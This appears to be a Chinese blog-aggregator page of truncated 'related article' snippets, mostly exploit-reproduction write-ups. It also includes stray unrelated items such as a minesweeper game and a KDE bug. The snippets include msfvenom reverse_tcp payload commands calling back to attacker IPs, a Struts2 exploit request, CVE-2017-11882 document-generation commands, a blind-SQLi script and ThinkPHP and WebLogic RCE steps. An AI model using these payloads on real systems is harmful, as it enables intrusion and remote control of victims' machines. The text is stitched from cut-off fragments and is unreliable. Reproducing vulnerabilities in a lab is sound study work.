[复现]GXY2019】的更多相关文章

前言 当时GXY的时候在复习中,临时抱拂脚,没时间打比赛.就写了一题./(ㄒoㄒ)/~~ babysqli 当时做了写了笔记. 过滤了or,()其中or可以用大小写绕过,可以用order by盲注 第一列应该是id,第二列是用户名,第三列是密码 当提示wrong pass,说明第一行是正确的账户密码取出来比对错误 当提示wrong user,说明第一行不是admin用户,此时输入的字符串第一位比md5哈希后的密码第一位小 import requests url='http://183.129.1…
国庆小长假,当大家都去看人山人海的时候,我独自一人狂码代码.这两天想要实现的内容是Windows上的一个经典游戏——扫雷.相信90后和一些上班族对此并不陌生.然而,从win8开始,扫雷就不再是Windows上的默认自带游戏了,但是可以通过微软的应用商店进行下载安装(界面更酷炫,游戏模式更丰富).目前在win10上也暂时没有找到这款游戏. 这两天再次用Qt基本图形界面框架,来实现扫雷游戏的功能.本想做得酷炫酷炫再酷炫的,但是真正动手写起来的时候,才发现还是有很多技术关没有通过,因此界面写得丑了.这…
现象: konsole,setting等plasma的系统应用反应缓慢,在滚动条滚动时,尤为明显. 触发条件: 并不是十分明确的系统滚动升级(Syu)后,产生. 现象收集: 可疑的dmesg [ ::00.0: DRM: resuming kernel object tree... [ ::00.0: priv: HUB0: 6013d4 badf573f (1e408200) [ ::00.0: priv: HUB0: 10ecc0 ffffffff (1b40822c) [ ::00.0:…
时空上下文视觉跟踪(STC)算法的解读与代码复现 zouxy09@qq.com http://blog.csdn.net/zouxy09 本博文主要是关注一篇视觉跟踪的论文.这篇论文是Kaihua Zhang等人今年投稿到一个会议的文章,因为会议还没有出结果,所以作者还没有发布他的Matlab源代码.但为了让我们先睹为快,作者把论文放在arxiv这个网站上面供大家下载了.对于里面所描述的神奇的效果,大家都跃跃欲试,也有人将其复现了.我这里也花了一天的时间去复现了单尺度的C++版本,主要是基于Op…
没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息.以下是其中Esteemaudit漏洞复现过程. 前期准备 IP 系统信息 用途 备注 192.168.146.132 Windows xp 攻击机 需安python2.6.6&pywin32 192.168.146.129 kali 2.0 用于生成攻击payload(反…
前言 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘.网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享. 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞…
一.复现环境搭建 搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162): 靶机:debian (192.168.217.150). 二.Debian安装并配置samba 1.首先,下载安装samba服务器 # apt-get install samba 2.在debian下创建一个共享目录,我这里为/mnt/shared # mkdir /mnt/shared 3.配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加: [sha…
在刚刚结束的BlackHat2017黑帽大会上,最佳客户端安全漏洞奖颁给了CVE-2017-0199漏洞,这个漏洞是Office系列办公软件中的一个逻辑漏洞,和常规的内存破坏型漏洞不同,这类漏洞无需复杂的利用手法,直接就可以在office文档中运行任意的恶意脚本,使用起来稳定可靠,故而非常适合于漏洞学习新手测试调试使用,作为一个已经测试过该漏洞的新手,现将搭建环境和测试的全部过程呈献给大家,希望能对大家的学习有所帮助. CVE-2017-0199实际上包含两个漏洞,其中一个称为"RTF URL…
0x00 前言 早上看Sec-news安全文摘的时候,发现腾讯安全应急响应中心发表了一篇文章,Node.js CVE-2017-14849 漏洞分析(https://security.tencent.com/index.php/blog/msg/121),然后想着复现,学习学习,就有了这篇文章. 0x01 漏洞简介 CVE(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14849)上面的描述是这样的: Node.js 8.5.0 b…
一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2.5 – Struts2.5.12版本 Struts2.3.33版本 三.漏洞POC POST /struts2-rest-showcase/orders//edit HTTP/1.1 Host: localhost: Upgrade-Insecure-Requests: User-Agent: M…
我们的攻击机IP是192.168.222.133 目标机IP是192.168.222.132 我们首先生成一个powershell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1 把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html service apache2 start…
00x0 引言 早上起来,发现seebug更新了一批新的洞, 发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~) 环境:zzcms8.2(产品招商型) php-5.4.45 . mysql-5.5.53 01x0 任意用户密码重置 01x1 任意用户密码重置方式一 话说,这个洞的标题应该是任意前台用户密码重置,后台管理员重置不了的,或许是我复现的问题.~~ 先注册个账号,然后首页点击找回密码. 地址:http://localhost/on…
昨晚看到的有复现的文章,一直到今天才去自己复现了一遍,还是例行记录一下. POC: https://github.com/Ridter/CVE-2017-11882/ 一.简单的生成弹计算器的doc文件. 网上看到的改进过的POC,我们直接拿来用,命令如下: #python Command_CVE--.py -c "cmd.exe /c calc.exe" -o test.doc 生成的doc文件直接打开就可以弹出计算器. 影响的脚本: Office Microsoft Office…
原文地址:https://bbs.ichunqiu.com/thread-23115-1-1.html 本来今晚在准备复现最近的CVE-2017-11882,由于本人是小白一枚,不知道这么添加msf的exp,一番搜索之后在I春秋看到大神的文章,觉得有用就尝试着试了一下,因此写这篇文,即为记录也为总结. 一.添加新的exploit 首先是进入到我们msf的exp目录下:/usr/share/metasploit-framework/modules/exploits,由于ms17-010属于利用sm…
1.抓取出现问题的日志,还原操作过程,分析 每个过程中数据是否正常?是否有重复请求 2.询问当时操作员执行了哪些操作,尽可能多的了解事发经过 3.通过查看日志,数据库等信息,找到发生问题的节点, 比如说XX被重复调用, XX传输的数据存在问题 4.分析发生问题的原因?大部分有如下原因 1.用户错误使用,但是没有对应错误限制 2.全局变量初始化错误,各种场景重复操作就会出现 3.数据量太大,但是没有限制 4.网络不好,重复请求(点击) 5.多人同时操作同一个数据,导致数据错乱 6.数据的同步异步请…
这道题搞了我很长时间,主要太菜了,开始复现吧 <?php     $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);     @mkdir($sandbox);     @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));  …
当时做这题的时候,写了脚本,用的if(mid())<>来爆破的,可能因为写脚本不擅长,写的太乱了,直接把payload写进mid里,整个一堆,然后括号对着WP看的时候,少了好几个括号,导致爆破失败,真的臭FIVE.首先来复现一遍把 一般都是习惯性查看源代码, . 其实就是过滤了一些函数和and,=等  ,这些被过滤的话,而且对应着 我一开始想到的就是bool盲注,用if(0,1,2),if(1,1,2)测试过.然后一般是有两种尝试方式,一种是ascii+substr或者if+mid.我一开始就…
Git漏洞允许任意代码执行(CVE-2018-17456) 国外安全研究员 joernchen 在 9 月 23 日向 git 官方报告了漏洞的相关细节.10月5日,Git项目披露了一个漏洞,编号为CVE-2018-17456.当用户克隆恶意存储库时,该漏洞可能会导致执行任意代码. 漏洞描述 这个漏洞已被分配 CVE-2018-17456 这个唯一 ID,与之前的 CVE-2017-1000117 可选注入漏洞相似 -- 恶意仓库可以新建一个 .gitmodules 文件,其中包含以破折号开头的…
markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到HackMD在前端渲染Markdown时的XSS防御所引起我的兴趣,由于HackMD允许嵌入客制化的网页标签,为了防止XSS的问题势必得对HTML进行过滤,这里HackMD使用了一个XSS防御函示库- npm/xss来防御!从相关的文档及GitHub上的Issue及星星数观察看起来是一个很成熟的XSS防御函…
漏洞分析: 当weblogic使用WLS-WebServices组件时,该组件会调用XMLDecoder解析XML数据,由此就产生了该漏洞 影响版本: weblogic<10.3.6版本 复现过程: 依然还是用docker,输入命令: docker-compose up -d 进入该环境,访问http://192.168.80.156:7001/,出现如下界面: 抓包,修改包重新发送:发送内容如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host…
虽然网上已经有几篇公开的漏洞分析文章,但都是针对5.1版本的,而且看起来都比较抽象:我没有深入分析5.1版本,但看了下网上分析5.1版本漏洞的文章,发现虽然POC都是一样的,但它们的漏洞触发原因是不同的.本文分析5.0.22版本的远程代码执行漏洞,分析过程如下: (1)漏洞复现 环境php5.5.38+apache. POC:http://172.19.77.44/thinkphp_5.0.22_with_extend/public/index.php?s=index/think\app/inv…
影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.94 LPORT=2333 -f python>/…
前言: 学习下该漏洞,记录下这是自动化复现,没有具体分析.菜逼只会用. 00x1: 漏洞简单描述: 该漏洞事一个由UNACEV2.dll代码库中的一个深藏已久的漏洞 当攻击者制作一个恶意的ACE文件时候,当WINRAR打开的时候,会利用该代码库UNACEV2.dll 中的路径遍历漏洞将文件放在指定的目录,一般放在启动文件里面,当受害者再次打开电脑的时候就自动执行程序. 00x2: 1.由于unacev2.dll 解压ACE压缩包时候只校验了CRC,(CRC是一种循环冗余校验码) 所以构造CRC效…
第一次成功复现一个简单漏洞,于是写下这篇随笔记录一下 首先我们来看dvwa中low级的sql注入的源码 源码文件路径如下图: 源码如下: <?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid)…
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘.网络共享等途径触发漏洞,完全控制用户系统,安全风险高危具体详情如下:          漏洞编号: CVE-2017-8464漏洞名称: Microsoft Windows官方评级:高危漏洞描述:攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享. 当用户在Windows资源管理器或解析.…
参考链接: http://www.freebuf.com/vuls/161262.html 今日看新漏洞发现一个UC编辑部的标题,CVE-2018-5711:一张GIF图片就能让服务器宕机的PHP漏洞,赶紧点卡看看是啥. 经过了解发现,该漏洞有一定攻击面,攻击方式为DDoS. 漏洞背景: 漏洞由台湾Web漏洞挖掘大牛Orange Tsai发现. 漏洞编号:CVE-2018-5711,它能用一张GIF图片就可导致服务器发生崩溃直至宕机,在现实中非常容易利用. 漏洞影响的PHP版本: 包含以下PHP…
本来用的是苹果ios得手机,但是步骤较为复杂,没有吃透,最后妥协用了android的机器搞得. 首先找到大牛的github https://github.com/wangshub/wechat_jump_game/ 实验环境: win10+ADB+python3+Huawei荣誉V8 https://adb.clockworkmod.com/   adb下载 复现步骤: 安装依赖 pip install -r requirements.txt 安卓手机打开 USB 调试,设置>开发者选项>US…
WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/ssrf/ docker-compose up -d 这时我们就可以访问docker中weblogic的地址,地址为ubuntu(IP):7001,访问 http://192.168.126.142:700…
s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描述: 该漏洞由lgtm.com的安全研究员汇报,编号为 CVE-2017-9805 ,漏洞危害程度为高危(Critical). 当用户使用带有 XStream 程序的 Struts REST 插件来处理 XML payloads 时,可能会遭到远程代码执行攻击. Struts 2.5 – Strut…
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行. 影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本 首先我还是记录一下敏感目录 http://127.0.0.1/typecho0.9/install.php http://127.0.0.1/typecho0.9/install.php?finish&use…